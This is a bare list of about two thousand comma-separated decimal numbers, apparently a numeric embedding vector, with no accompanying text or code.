0.018703272566199303, 0.0023721223697066307, 0.0009104540222324431, 0.058421116322278976, 0.027446672320365906, 0.05836029350757599, 0.01827750727534294, 0.00805153138935566, -0.014506440609693527, -0.018292713910341263, -0.003126715775579214, -0.018201477825641632, 0.01677212119102478, -0.010233579203486443, 0.007770221680402756, 0.03853178396821022, 0.0020052797626703978, 0.009077929891645908, 0.010522492229938507, -0.025880463421344757, -0.0259108766913414, -0.04075184836983681, -0.026534318923950195, 0.03494318947196007, -0.047624919563531876, 0.009366841986775398, -0.016179092228412628, -0.024192607030272484, 0.03646377846598625, 0.01204308308660984, -0.03962660953402519, 0.0054095033556222916, -0.038075607270002365, 0.023265046998858452, 0.035916365683078766, -0.0544675812125206, 0.010058711282908916, 0.016817739233374596, -0.02515058033168316, 0.03421330451965332, -0.02956029400229454, -0.009648151695728302, -0.029210558161139488, 0.03048785589635372, -0.01174656767398119, -0.05851235240697861, -0.026443082839250565, -0.004998943768441677, -0.023782048374414444, -0.04823315516114235, 0.027522701770067215, -0.024952903389930725, 0.033757127821445465, -0.010469270870089531, -0.009313621558248997, 0.007591552101075649, -0.007629566825926304, 0.02049756981432438, 0.011974656954407692, -0.005873283836990595, 0.010225976817309856, 0.014635691419243813, 0.019950157031416893, -0.010195564478635788, -0.019646039232611656, -0.005603379104286432, 0.046712566167116165, 0.04549609124660492, -0.0030639914330095053, 0.027020907029509544, -0.03652460128068924, 0.01943315751850605, -0.042059555649757385, 0.02140992507338524, 0.009899049066007137, 0.019068215042352676, -0.0007450897246599197, 0.0052612461149692535, 0.0017762407660484314, 0.026291023939847946, 0.029438648372888565, -0.016620062291622162, 0.007838647812604904, -0.007937486283481121, 0.0004338436992838979, -0.008910665288567543, -0.006641182582825422, -0.030776767060160637, -0.03178035840392113, -0.03786272183060646, -0.023706018924713135, 0.0037995774764567614, -0.03834931179881096, 0.0376802533864975, -0.020360717549920082, -0.02998606115579605, 0.009861034341156483, -0.028602322563529015, -0.029195353388786316, -0.0178669486194849, -0.013099893927574158, -0.01885533146560192, -0.019144244492053986, 0.034578245133161545, -0.027674762532114983, -0.014787750318646431, 0.011054698377847672, -0.002776979934424162, -0.023706018924713135, -0.016832945868372917, 0.029955647885799408, -0.004379302728921175, -0.010895037092268467, 0.020862512290477753, -0.005189017858356237, -0.021440336480736732, 0.06356071680784225, 0.042880672961473465, 0.004101795144379139, -0.02349313534796238, 0.013069482520222664, -0.025926081463694572, 0.001534846844151616, 0.009914255701005459, 0.0005664202617481351, 0.013981836847960949, -0.005466525908559561, 0.015091869048774242, -0.012020274065434933, 0.015411192551255226, 0.006895881611853838, -0.05048363283276558, 0.008005913347005844, -0.038075607270002365, 0.007230411749333143, 0.01449123490601778, 0.012103906832635403, -0.004193030297756195, 0.02201816253364086, -0.03910961002111435, 0.0024063356686383486, 0.009359239600598812, 0.005109186749905348, 0.017547624185681343, -0.008781414479017258, -0.022048573940992355, 0.02317381091415882, 0.019570009782910347, -0.009077929891645908, 0.013312776573002338, 0.043306440114974976, 0.024375079199671745, 0.007907074876129627, -0.026351846754550934, 0.0005455121281556785, 0.009625342674553394, 0.021470749750733376, -0.043184794485569, -0.016787327826023102, 0.03403083235025406, -0.012027877382934093, -0.020862512290477753, -0.012240760028362274, -0.00817317795008421, -0.016011826694011688, -0.03479113057255745, -0.007762618362903595, -0.029545089229941368, 0.022869693115353584, 0.004653009586036205, 0.026291023939847946, -0.0036760293878614902, -0.041147202253341675, -0.004656810779124498, -0.007777824532240629, 0.02790285088121891, 0.024709608405828476, 0.018368743360042572, 0.0025355860125273466, -0.007507919333875179, 0.018201477825641632, -0.009199577383697033, -0.019159451127052307, -0.01593579724431038, -0.03695036843419075, 0.009169165976345539, -0.001831362140364945, -0.008606546558439732, -0.0005189017974771559, 0.022109396755695343, 0.024876873940229416, 0.007466103415936232, -0.02049756981432438, 0.026701582595705986, -0.02641267143189907, -0.008903061971068382, -0.028252586722373962, 0.029773177579045296, 0.009039915166795254, 0.02840464562177658, -0.0015101372264325619, -0.022185426205396652, 0.018536007031798363, -0.02805490978062153, 0.01884012669324875, 0.02416219562292099, 0.010454065166413784, 0.016391973942518234, 0.00460739154368639, 0.010849419049918652, 0.01975248008966446, 0.0008097148966044188, -0.004329883959144354, 0.009070327505469322, -0.002695247996598482, -0.01585976779460907, -0.012894614599645138, 0.004310876131057739, -0.013175923377275467, 0.021455543115735054, -0.03953537344932556, -0.00469102431088686, 0.007914677262306213, 0.0012554381974041462, 0.006302850786596537, 0.0030582891777157784, -0.013137908652424812, 0.02740105614066124, 0.009465680457651615, -0.006074762437492609, -0.031202534213662148, -0.015000632964074612, 0.0025336851831525564, -0.010324815288186073, 0.009914255701005459, 0.025104962289333344, 0.02600211091339588, -0.03056388534605503, -0.0038413938600569963, -0.005154804326593876, -0.006899682804942131, -0.024557549506425858, -0.03272312507033348, 0.03619007393717766, -0.01595100201666355, -0.023523546755313873, 0.022443927824497223, -0.016665680333971977, 0.013936219736933708, 0.006074762437492609, 0.01353326253592968, 0.019493980333209038, -0.03211488947272301, 0.04075184836983681, -0.004462935496121645, -0.016315944492816925, -0.034669481217861176, 0.017882153391838074, -0.0033034845255315304, -0.008431678637862206, -0.03497359901666641, 0.03281436115503311, 0.010454065166413784, 0.01785174198448658, 0.058998942375183105, -0.028374234214425087, 0.023097781464457512, 0.004193030297756195, 0.013008658774197102, 0.0033909184858202934, -0.013092291541397572, 0.03272312507033348, 0.05486293509602547, -0.04592185840010643, 0.016878563910722733, -0.021896515041589737, 0.02367560565471649, 0.019478773698210716, 0.0002898627135436982, -0.025880463421344757, -0.004257655702531338, -0.026671171188354492, -0.01693938672542572, 0.04598268121480942, -0.009914255701005459, -0.05030116066336632, -0.017061034217476845, 0.018885744735598564, 0.02299134060740471, -0.005306863691657782, -0.006002534180879593, 0.010263991542160511, 0.007990707643330097, -0.0055083418264985085, -0.04017402231693268, 0.007374867796897888, -0.02600211091339588, -0.0012991551775485277, -0.010993875563144684, 0.012879407964646816, 0.008370854891836643, 0.0033700105268508196, -0.012027877382934093, -0.014133895747363567, 0.01611826755106449, 0.01844477280974388, 0.01993495225906372, -0.02849588170647621, 0.04050855338573456, 0.04002196341753006, -0.012324392795562744, -0.02315860614180565, -0.047868214547634125, -0.019296303391456604, 0.000986483646556735, 0.007443294394761324, 0.013434424065053463, -0.005846673622727394, -0.01709144562482834, -0.02391890063881874, 0.020239070057868958, 0.0017743399366736412, 0.01769968308508396, -0.010742977261543274, 0.01867286115884781, 0.024375079199671745, -0.018779302015900612, -0.029012881219387054, 0.011921435594558716, 0.006831256207078695, 0.005390495993196964, 0.001003590296022594, -0.00003667832424980588, -0.0017724392237141728, -0.004755649250000715, 0.004113199654966593, -0.03421330451965332, -0.00022725711460225284, 0.010826610028743744, -0.0064853220246732235, -0.011997465044260025, -0.006280042231082916, 0.05163928121328354, -0.0004761351447086781, 0.042880672961473465, 0.03895754739642143, 0.0033167898654937744, -0.01570770889520645, 0.03415248170495033, 0.003972544800490141, -0.008165575563907623, -0.0037881729658693075, -0.03260147571563721, 0.018338331952691078, -0.012674128636717796, -0.009526504203677177, -0.0022333685774356127, 0.017000211402773857, -0.004820274654775858, -0.005801055580377579, -0.013928616419434547, -0.007530728355050087, -0.005839070770889521, 0.006812248844653368, -0.02201816253364086, 0.011480464600026608, 0.01844477280974388, -0.021653220057487488, -0.00770179508253932, 0.012750158086419106, -0.01718268170952797, -0.005208025220781565, 0.00900950375944376, -0.02267201617360115, -0.026458289474248886, -0.022535163909196854, -0.0020908131264150143, -0.0017192185623571277, 0.013730939477682114, 0.000041489573050057516, 0.01502344198524952, 0.008811826817691326, -0.011275184340775013, -0.027842026203870773, 0.005569165572524071, 0.014050263911485672, -0.011100316420197487, 0.024968110024929047, -0.00017629355716053396, 0.0004716209077741951, 0.006158394739031792, 0.021698838099837303, 0.014635691419243813, -0.011237169615924358, 0.008393663913011551, -0.03734572231769562, 0.0016774022951722145, -0.015487222000956535, 0.01042365375906229, 0.013867792673408985, -0.023645194247364998, 0.03643336892127991, 0.013305174186825752, 0.027613937854766846, 0.021121013909578323, -0.001324815209954977, -0.010780991986393929, -0.005706018768250942, 0.020527983084321022, -0.024375079199671745, 0.009055120870471, -0.014749735593795776, -0.020056599751114845, 0.002151636639609933, -0.005337275564670563, 0.006063357926905155, -0.004565575160086155, -0.0021497360430657864, 0.010302006267011166, -0.026960084214806557, 0.0209993664175272, -0.008112354204058647, -0.005398099310696125, 0.0090019004419446, -0.03156747668981552, -0.0066297780722379684, 0.03030538372695446, -0.03214529901742935, 0.01087222807109356, 0.043215204030275345, 0.02407095953822136, 0.011860611848533154, -0.04725997895002365, -0.010119535028934479, -0.024040548130869865, 0.023629989475011826, -0.004934318829327822, -0.023523546755313873, 0.014270748943090439, -0.009184371680021286, -0.006063357926905155, 0.020558394491672516, 0.01270454004406929, -0.0166808869689703, 0.03156747668981552, -0.00215733889490366, -0.029362618923187256, -0.016985004767775536, 0.03393959626555443, 0.0180038008838892, -0.004546567797660828, -0.009161562658846378, 0.017669271677732468, 0.00108532200101763, -0.018125448375940323, -0.03132418170571327, -0.011921435594558716, 0.0028073915746062994, -0.013860189355909824, 0.02589567005634308, -0.01634635590016842, 0.028769588097929955, -0.024268636479973793, -0.007766420021653175, 0.03039661981165409, -0.027583526447415352, 0.01220274530351162, -0.0036152058746665716, 0.004497148562222719, -0.03302724286913872, -0.006192608270794153, 0.006656388286501169, -0.02481604926288128, 0.00876620877534151, -0.0037349523045122623, -0.03144582733511925, 0.009929461404681206, -0.023888489231467247, -0.005078774876892567, 0.018049418926239014, 0.010933051817119122, 0.006648785434663296, -0.006736219394952059, -0.011412037536501884, -0.0012060189619660378, 0.01233199518173933, -0.004508553072810173, 0.013806968927383423, -0.020330306142568588, 0.005793452728539705, -0.014498838223516941, 0.027218583971261978, -0.014369587413966656, -0.0023873283062130213, -0.03345301002264023, -0.014057866297662258, -0.009663357399404049, -0.036342132836580276, -0.013974234461784363, -0.021896515041589737, -0.006884477101266384, 0.005656599532812834, 0.020908130332827568, 0.033513832837343216, -0.001136641949415207, 0.018885744735598564, -0.023432312533259392, 0.005036958493292332, -0.03247983008623123, -0.013229144737124443, 0.009480887092649937, -0.013442027382552624, 0.029940443113446236, 0.003926927223801613, -0.004668215289711952, 0.009169165976345539, 0.023112988099455833, 0.006105173844844103, 0.00469102431088686, -0.04370179399847984, 0.004014361184090376, -0.010887433774769306, -0.031597886234521866, -0.010149947367608547, 0.03065512143075466, -0.011594508774578571, -0.03348341956734657, -0.01993495225906372, -0.015874972566962242, -0.026367053389549255, -0.022611193358898163, 0.04358014836907387, 0.002246673684567213, 0.017045827582478523, -0.012522069737315178, 0.03272312507033348, 0.009769799187779427, -0.03038141503930092, -0.005382893141359091, -0.03135459125041962, -0.04713832959532738, 0.01643759198486805, 0.024876873940229416, 0.00042457759263925254, -0.0458306223154068, -0.017745301127433777, 0.036220483481884, 0.03430454060435295, 0.010560506954789162, -0.02259598672389984, 0.006295247934758663, -0.02060401253402233, -0.001125237555243075, -0.020208658650517464, -0.00017771910643205047, -0.008028722368180752, -0.006998521275818348, 0.003330094972625375, 0.04136008396744728, -0.02077127806842327, -0.025637168437242508, 0.018247095867991447, 0.024511931464076042, -0.010104329325258732, 0.004922914318740368, -0.042059555649757385, -0.02283928170800209, -0.004748046398162842, -0.027918055653572083, 0.017958182841539383, 0.01744118146598339, 0.050118688493967056, 0.007302639540284872, 0.0061697992496192455, -0.007785427384078503, 0.03071594424545765, -0.005265047308057547, -0.0298796184360981, -0.02017824724316597, 0.007534530013799667, -0.009275606833398342, -0.013685321435332298, 0.007922280579805374, -0.01174656767398119, -0.006261034868657589, -0.004113199654966593, 0.034334950149059296, -0.000057111272326437756, -0.016331151127815247, -0.012643716298043728, -0.028419852256774902, -0.014704117551445961, -0.026534318923950195, -0.012088701128959656, 0.0070327348075807095, -0.01233199518173933, -0.0010340020526200533, 0.010096726007759571, 0.007390073500573635, -0.02026948146522045, -0.019737275317311287, -0.03229735791683197, -0.01893136091530323, -0.02665596641600132, -0.01669609174132347, -0.020360717549920082, -0.014080675318837166, 0.029925236478447914, -0.012012671679258347, -0.014666102826595306, 0.0037482576444745064, 0.01494741253554821, 0.010180358774960041, 0.012263569049537182, -0.01308468822389841, -0.01265892293304205, 0.008720590732991695, 0.013875395990908146, -0.029955647885799408, 0.012134318239986897, -0.008234001696109772, -0.017973389476537704, 0.004922914318740368, -0.01595100201666355, 0.0004485744284465909, 0.04589144513010979, 0.014065469615161419, 0.03646377846598625, -0.008834635838866234, -0.026625553146004677, -0.01643759198486805, -0.012096303515136242, 0.00658416049554944, 0.017912564799189568, 0.03959619626402855, -0.02233748696744442, -0.014704117551445961, -0.01602703146636486, 0.005052164662629366, 0.025424286723136902, -0.02764434926211834, 0.0030373812187463045, 0.005420907866209745, 0.013130306266248226, 0.034000422805547714, -0.05541034787893295, 0.04540485516190529, 0.007694191765040159, 0.005420907866209745, -0.012795776128768921, -0.023432312533259392, -0.03056388534605503, -0.032753538340330124, -0.010780991986393929, 0.01610306277871132, -0.012468848377466202, -0.014240337535738945, -0.006895881611853838, 0.014544455334544182, 0.01684815250337124, -0.014962618239223957, 0.023432312533259392, -0.011183949187397957, -0.020315099507570267, 0.018414361402392387, -0.017045827582478523, 0.0072494191117584705, -0.002491869032382965, -0.025028932839632034, 0.027446672320365906, 0.03135459125041962, 0.03147624060511589, -0.026275817304849625, 0.014498838223516941, -0.0017610348295420408, 0.011640126816928387, 0.000008130115020321682, 0.018536007031798363, -0.029453853145241737, -0.00921478308737278, 0.023964518681168556, 0.01926589198410511, 0.025941288098692894, 0.0025621962267905474, 0.0031191129237413406, 0.004170221742242575, 0.00319704320281744, -0.009701372124254704, 0.0009194825543090701, -0.019159451127052307, -0.029849207028746605, 0.0024519534781575203, 0.029742766171693802, 0.004881097935140133, -0.03424371778964996, -0.028936851769685745, 0.0060823652893304825, 0.0006486272322945297, 0.0038071805611252785, 0.001090073841623962, 0.00434128800407052, -0.01868806779384613, 0.011571699753403664, -0.00846969336271286, 0.0621313601732254, -0.00487729674205184, -0.004071383271366358, 0.0039687431417405605, -0.0022922914940863848, 0.00442492077127099, 0.004322280641645193, -0.014787750318646431, -0.007199999876320362, -0.0376802533864975, 0.0045579723082482815, -0.02691446617245674, -0.04145132005214691, -0.031035268679261208, 0.00010501583892619237, 0.028359027579426765, -0.011138331145048141, 0.0014208025531843305, 0.0259108766913414, -0.010765786282718182, -0.009785004891455173, -0.011252375319600105, 0.028359027579426765, -0.02849588170647621, 0.00724561745300889, -0.007219007238745689, -0.02665596641600132, -0.016042238101363182, -0.031111298128962517, -0.030001265928149223, -0.007002322934567928, 0.0028397042769938707, -0.054345931857824326, 0.02118183672428131, 0.005341076757758856, -0.009450474753975868, 0.033848363906145096, 0.012316789478063583, -0.0172739177942276, -0.02049756981432438, -0.01952439174056053, 0.003039281815290451, -0.01844477280974388, 0.017578035593032837, 0.008226399309933186, 0.09372925013303757, -0.0077512143179774284, -0.002503273542970419, -0.01287180557847023, 0.009617740288376808, -0.0006443505408242345, 0.024952903389930725, 0.021638013422489166, 0.020299894735217094, 0.03211488947272301, 0.02557634562253952, -0.009397254325449467, -0.00048540125135332346, -0.004136008210480213, -0.002735163550823927, -0.01175417099148035, -0.015798943117260933, -0.0030906018801033497, 0.019478773698210716, -0.010857021436095238, 0.01034002099186182, 0.011997465044260025, 0.01166293490678072, -0.01610306277871132, 0.016498414799571037, -0.01137402281165123, -0.01382977794855833, -0.020740864798426628, -0.02192692644894123, -0.005158605985343456, -0.01532756071537733, -0.03171953558921814, -0.013921013101935387, -0.006302850786596537, 0.0025450896937400103, 0.005785849876701832, 0.03211488947272301, -0.002164941979572177, -0.008249207399785519, -0.006633579730987549, -0.0005189017974771559, -0.007777824532240629, -0.02200295589864254, -0.008773812092840672, 0.012012671679258347, -0.028039703145623207, 0.02889123558998108, 0.025591552257537842, 0.006409292109310627, 0.005257444456219673, -0.009944667108356953, -0.027598731219768524, 0.029043294489383698, 0.0291497353464365, -0.010302006267011166, 0.01374614518135786, -0.00338521646335721, -0.008971489034593105, 0.00037230728776194155, -0.023310665041208267, -0.0010606123832985759, 0.009290812537074089, 0.010879830457270145, 0.022383103147149086, 0.002526082331314683, -0.010560506954789162, -0.003691235324367881, 0.014726926572620869, -0.024466313421726227, 0.03112650476396084, 0.011488066986203194, 0.0022295669186860323, 0.009207180701196194, 0.0014977824175730348, -0.0009223336819559336, 0.02930179424583912, -0.012985849753022194, 0.010317211970686913, -0.027036113664507866, -0.01941795088350773, 0.011678141541779041, 0.027537908405065536, -0.006519535090774298, 0.03171953558921814, -0.018110241740942, 0.019889334216713905, 0.002258078195154667, -0.004862090572714806, 0.024861667305231094, -0.007028933148831129, -0.017000211402773857, 0.005284054670482874, 0.02332586981356144, 0.013753748498857021, 0.014498838223516941, 0.02066483534872532, -0.0015148890670388937, -0.028952058404684067, -0.003324392717331648, -0.009473283775150776, 0.008081942796707153, -0.002495670458301902, 0.04026525840163231, -0.004386906046420336, -0.01137402281165123, -0.007846251130104065, -0.00030388066079467535, 0.02382766641676426, 0.0011176345869898796, -0.016954593360424042, -0.03780189901590347, -0.01567729562520981, 0.015274339355528355, -0.009541710838675499, -0.027537908405065536, 0.018231889232993126, -0.007758817169815302, -0.009739386849105358, 0.00018365892174188048, -0.025774022564291954, -0.03679830953478813, -0.015814149752259254, 0.030153324827551842, -0.010819006711244583, 0.01576853170990944, 0.0016317844856530428, -0.001843716949224472, -0.019478773698210716, 0.044462088495492935, 0.026032522320747375, 0.020816894248127937, -0.0052194297313690186, -0.007637169677764177, 0.010370432399213314, 0.011480464600026608, -0.018201477825641632, 0.00958732794970274, -0.008598944172263145, 0.011366420425474644, -0.006667792797088623, -0.010096726007759571, 0.03223653510212898, 0.017654065042734146, 0.020299894735217094, -0.0021497360430657864, -0.0027332629542797804, 0.0086369588971138, 0.04087349399924278, 0.017471594735980034, -0.0011404434917494655, 0.010203167796134949, -0.005052164662629366, 0.020117422565817833, 0.028526293113827705, 0.004523759242147207, 0.004926715977489948, 0.04157296568155289, -0.00913875363767147, 0.009845828637480736, 0.00386230181902647, 0.008568531833589077, 0.010195564478635788, 0.011891024187207222, -0.00025042236666195095, 0.004896304104477167, 0.013229144737124443, 0.0027237592730671167, -0.04087349399924278, -0.003202745458111167, -0.020406335592269897, 0.02209419198334217, -0.005850474815815687, -0.008249207399785519, 0.021303484216332436, 0.010560506954789162, 0.005112988408654928, -0.03564266115427017, -0.019950157031416893, 0.026108551770448685, -0.005652798339724541, -0.021972544491291046, 0.025713199749588966, -0.0019045405788347125, 0.018748890608549118, 0.038227666169404984, -0.015069060027599335, 0.01926589198410511, 0.010659345425665379, -0.05273410677909851, 0.0031362194567918777, 0.010864624753594398, 0.02764434926211834, -0.01636156253516674, -0.006968109868466854, -0.01249926071614027, -0.006941499188542366, 0.0021611403208225965, 0.0008177930139936507, -0.016255121678113937, -0.004136008210480213, -0.02034551091492176, -0.010362830013036728, -0.006010137032717466, 0.016924181953072548, -0.015038647688925266, -0.03631171956658363, 0.011761773377656937, 0.005181415006518364, -0.01610306277871132, -0.0022314677480608225, -0.008583737537264824, 0.007945089600980282, 0.011047095991671085, 0.009792608208954334, 0.0022713833022862673, 0.020892923697829247, 0.008621752262115479, -0.021075395867228508, 0.003628510981798172, 0.0005331573192961514, -0.031749945133924484, 0.014225131832063198, 0.0003799102269113064, -0.01636156253516674, -0.015905385836958885, 0.001400844776071608, 0.03257106617093086, -0.02017824724316597, -0.012826187536120415, 0.022702427580952644, -0.005557761061936617, 0.008431678637862206, 0.007572544738650322, 0.015183104202151299, -0.008484899066388607, -0.02896726503968239, 0.016498414799571037, 0.0007412882405333221, 0.0002941393759101629, 0.00620401231572032, 0.0024177401792258024, -0.0017648362554609776, -0.008477296680212021, -0.007298838347196579, -0.006010137032717466, -0.00035828931140713394, 0.010362830013036728, 0.01457486767321825, -0.0076675815507769585, 0.025211403146386147, -0.00818078126758337, 0.010948257520794868, -0.01569250226020813, -0.00967856403440237, 0.0052764518186450005, 0.04227243736386299, -0.011693347245454788, 0.011206758208572865, 0.025089755654335022, -0.01116874348372221, -0.0012934529222548008, 0.0017410770524293184, -0.017289122566580772, -0.002683843718841672, -0.02533305063843727, 0.018809715285897255, -0.021212248131632805, -0.009169165976345539, 0.011252375319600105, 0.006606969051063061, 0.0006643083179369569, 0.006941499188542366, 0.015540443360805511, -0.006348468828946352, -0.01062893308699131, 0.007945089600980282, -0.006310454104095697, -0.011708552949130535, 0.004200633615255356, 0.003168532159179449, 0.015266736969351768, 0.05294698849320412, 0.0009047518251463771, -0.01725871115922928, 0.0019292501965537667, -0.015205913223326206, -0.023265046998858452, -0.017958182841539383, -0.02896726503968239, -0.010271593928337097, 0.0029100317042320967, 0.019053008407354355, 0.0006747624138370156, -0.032419007271528244, 0.03445659950375557, 0.003506863722577691, -0.022307073697447777, 0.040295667946338654, -0.0050445618107914925, -0.014126293361186981, 0.017076240852475166, 0.014985427260398865, 0.013046673499047756, 0.02224625088274479, -0.0018180569168180227, 0.007002322934567928, 0.003510665148496628, 0.0006989968242123723, 0.009191974066197872, 0.005797254387289286, -0.0005887539591640234, -0.0205127764493227, -0.021638013422489166, -0.03497359901666641, 0.021714042872190475, -0.006340865511447191, 0.009769799187779427, -0.016209503635764122, -0.007549735717475414, 0.009625342674553394, 0.017730094492435455, -0.01166293490678072, -0.002391129732131958, -0.04002196341753006, -0.004029566887766123, 0.002993664238601923, 0.008043928071856499, 0.017745301127433777, -0.013624497689306736, -0.02399493008852005, 0.033240124583244324, 0.03178035840392113, 0.028541497886180878, 0.011837802827358246, -0.0008947729365900159, -0.019570009782910347, 0.00038109818706288934, -0.0038546989671885967, 0.012734952382743359, -0.0048582893796265125, -0.03123294562101364, 0.009389651007950306, -0.00439831055700779, -0.00657655717805028, 0.022367898374795914, -0.0015101372264325619, 0.01818627119064331, 0.022474339231848717, 0.0045997886918485165, -0.04160337895154953, -0.014232734218239784, -0.014833368360996246, -0.002463357988744974, 0.009534107521176338, -0.009032312780618668, 0.013350791297852993, 0.0015034846728667617, 0.01124477293342352, 0.021805278956890106, -0.02756831981241703, -0.003086800454184413, -0.002763674594461918, 0.01004350557923317, 0.001773389638401568, 0.0030487854965031147, -0.006173600908368826, -0.005865680985152721, 0.0031134106684476137, -0.0013485744129866362, 0.013867792673408985, -0.014171910472214222, -0.0018912354717031121, 0.004257655702531338, -0.000554065452888608, -0.007101161405444145, 0.018338331952691078, 0.02414698898792267, -0.017638858407735825, -0.019798098132014275, 0.008568531833589077, 0.002881520427763462, -0.015555649064481258, 0.009815417230129242, 0.027689967304468155, -0.017167475074529648, -0.0031172120943665504, -0.008203590288758278, 0.009351636283099651, -0.007633368484675884, -0.005983526818454266, -0.002035691635683179, 0.022687222808599472, 0.01034002099186182, 0.03871425613760948, 0.032358184456825256, 0.025028932839632034, 0.02002618834376335, -0.0016717000398784876, -0.027385849505662918, 0.008021119050681591, 0.006827455013990402, 0.000594931363593787, -0.013609291985630989, 0.011016683652997017, 0.0016574445180594921, -0.005690813064575195, -0.013852586969733238, -0.002180147683247924, 0.02948426455259323, 0.008568531833589077, -0.0011642026947811246, -0.004002956673502922, 0.02907370589673519, 0.01116874348372221, -0.0057820482179522514, -0.00825681071728468, -0.010013094171881676, 0.004865892231464386, -0.017137063667178154, 0.003890813095495105, 0.007869060151278973, 0.030168531462550163, 0.00245005264878273, -0.03123294562101364, 0.010811404325067997, 0.00461119320243597, 0.002858711639419198, -0.015038647688925266, -0.010819006711244583, 0.020284688100218773, -0.011655332520604134, 0.009313621558248997, 0.022732840850949287, -0.00516620883718133, 0.036676663905382156, -0.006051953416317701, -0.015076662413775921, -0.01316071767359972, 0.0074775079265236855, 0.008104751817882061, 0.0027104539331048727, 0.008728194050490856, -0.0005545406602323055, -0.007519323844462633, 0.009062724187970161, -0.0020052797626703978, -0.006831256207078695, -0.014111087657511234, -0.016239915043115616, -0.01294783502817154, 0.024724815040826797, 0.005991129670292139, 0.0066753956489264965, 0.021029777824878693, 0.025621963664889336, -0.004523759242147207, 0.012484055012464523, -0.003780570114031434, -0.0166808869689703, -0.006340865511447191, 0.016635268926620483, -0.004896304104477167, 0.025469904765486717, 0.0178669486194849, 0.0020052797626703978, 0.02848067507147789, -0.006892079953104258, -0.012468848377466202, 0.007846251130104065, -0.014027454890310764, 0.03244941681623459, 0.0006186905666254461, 0.02248954586684704, -0.0013960929354652762, 0.0006144139333628118, -0.002957550110295415, -0.026108551770448685, -0.010119535028934479, -0.00639408640563488, 0.010233579203486443, -0.005687011405825615, 0.007937486283481121, -0.010233579203486443, -0.002799788722768426, 0.006432101130485535, 0.020467158406972885, 0.00338331563398242, 0.020892923697829247, 0.01005110889673233, 0.013761350885033607, -0.0022371700033545494, -0.000647201668471098, -0.022383103147149086, 0.010720168240368366, 0.014711720868945122, 0.022352691739797592, 0.011982259340584278, 0.007732206955552101, 0.03123294562101364, -0.0006500527961179614, -0.0010701161809265614, -0.005181415006518364, 0.018976978957653046, -0.009997887536883354, 0.022565575316548347, -0.011792185716331005, 0.001307708560489118, -0.001043505733832717, 0.010385639034211636, -0.01576853170990944, 0.02367560565471649, -0.0002177534333895892, -0.0031590284779667854, 0.011814994737505913, 0.012377613224089146, -0.01539598684757948, -0.0008391762967221439, -0.009556916542351246, -0.029590707272291183, 0.00404857425019145, 0.01419471949338913, 0.011305596679449081, -0.0080971485003829, -0.02706652507185936, 0.015905385836958885, -0.006036747246980667, 0.00020646778284572065, -0.011153536848723888, -0.00591510022059083, -0.013768954202532768, 0.010355226695537567, 0.009260401129722595, -0.009336430579423904, -0.010157549753785133, 0.004565575160086155, -0.0017239704029634595, 0.010203167796134949, -0.005489334464073181, 0.006029144395142794, -0.033848363906145096, 0.007428088691085577, -0.018992185592651367, -0.0065727559849619865, 0.018323125317692757, 0.0075383312068879604, -0.012970644049346447, -0.0059112985618412495, -0.02349313534796238, -0.0191898625344038, 0.006112777162343264, -0.009412460029125214, -0.002235269173979759, 0.004120802506804466, -0.018110241740942, 0.0018161562038585544, 0.01809503696858883, 0.010720168240368366, -0.012263569049537182, -0.013761350885033607, 0.013122702948749065, 0.005143400281667709, -0.004451530985534191, 0.012590495869517326, 0.013221541419625282, 0.012354804202914238, 0.007606757804751396, 0.0036950367502868176, 0.01129039004445076, -0.0053638857789337635, -0.009861034341156483, 0.0003124339855276048, 0.004934318829327822, -0.005325871054083109, 0.012681731022894382, 0.002666736952960491, 0.0010473072761669755, -0.0002846356946974993, -0.0041550155729055405, -0.0010957760969176888, -0.010613727383315563, 0.02540908008813858, 0.0048164729960262775, -0.015114677138626575, -0.0028035901486873627, -0.010461668483912945, -0.013061879202723503, 0.015738120302557945, -0.04169461503624916, -0.011047095991671085, -0.007009925786405802, 0.008667370304465294, 0.019448362290859222, -0.02034551091492176, 0.0035429776180535555, -0.016832945868372917, 0.0015785638242959976, -0.0180038008838892, -0.007747412659227848, -0.004976135212928057, 0.012111510150134563, -0.005500738974660635, -0.0023607180919498205, -0.016163885593414307, -0.009716578759253025, -0.01493980921804905, -0.010727771557867527, 0.05048363283276558, -0.021957337856292725, -0.010902639478445053, -0.006143189035356045, -0.006386483553797007, -0.016665680333971977, -0.008226399309933186, 0.007549735717475414, 0.01382977794855833, 0.002957550110295415, 0.011518479324877262, -0.0028720167465507984, -0.006702006328850985, -0.01928109861910343, 0.003504962893202901, 0.020695246756076813, -0.0011062301928177476, 0.0013371700188145041, 0.012674128636717796, -0.00834044348448515, 0.014802956022322178, -0.01294783502817154, 0.01852080225944519, -0.0057250261306762695, 0.012514466419816017, 0.021136218681931496, -0.0010957760969176888, 0.016087856143712997, -0.005489334464073181, 0.001609925995580852, -0.006519535090774298, 0.015722913667559624, 0.013654910027980804, 0.00005203273394727148, 0.0031552270520478487, -0.018201477825641632, -0.0007835797150619328, 0.0022998943459242582, -0.003098204731941223, 0.0029195353854447603, 0.005740232300013304, -0.012020274065434933, -0.004075184464454651, 0.001504434971138835, 0.010948257520794868, 0.017973389476537704, -0.013426820747554302, 0.022291868925094604, 0.013921013101935387, -0.02623019926249981, -0.012248363345861435, -0.012674128636717796, -0.00215733889490366, 0.02209419198334217, 0.01759324222803116, -0.0001840153126977384, -0.00442492077127099, 0.004911509808152914, -0.004029566887766123, -0.0028549102135002613, -0.022808870300650597, 0.0013086588587611914, 0.03427412733435631, 0.011047095991671085, -0.018338331952691078, 0.02931700088083744, -0.002700950251892209, -0.011526081711053848, -0.009777402505278587, -0.012012671679258347, -0.002374023199081421, -0.00938204862177372, -0.011624920181930065, 0.005242238286882639, 0.000025362987798871472, 0.004592185840010643, -0.0090019004419446, -0.004679619800299406, -0.02017824724316597, -0.002444350626319647, 0.003079197369515896, -0.00517001049593091, 0.008431678637862206, -0.027127347886562347, 0.0022086589597165585, 0.011731361970305443, 0.012271171435713768, 0.0007888067630119622, -0.021729249507188797, -0.03926166892051697, -0.010324815288186073, 0.014605279080569744, -0.01366251241415739, 0.001014044275507331, -0.00508637772873044, -0.0045275604352355, -0.005527349188923836, -0.010651742108166218, -0.015357972122728825, 0.00789186917245388, -0.008279619738459587, 0.0074394927360117435, 0.004493347369134426, -0.005333473905920982, 0.025682786479592323, -0.006751425564289093, 0.000563093984965235, -0.0036532205995172262, 0.007831045426428318, 0.017821330577135086, 0.012909820303320885, -0.0030012670904397964, 0.01595100201666355, 0.004862090572714806, -0.022109396755695343, 0.02300654724240303, -0.0002592132950667292, -0.012567686848342419, 0.003856599796563387, 0.009655755013227463, -0.013981836847960949, -0.009572122246026993, -0.0003917898575309664, 0.008325237780809402, 0.0007441393681801856, 0.020543187856674194, 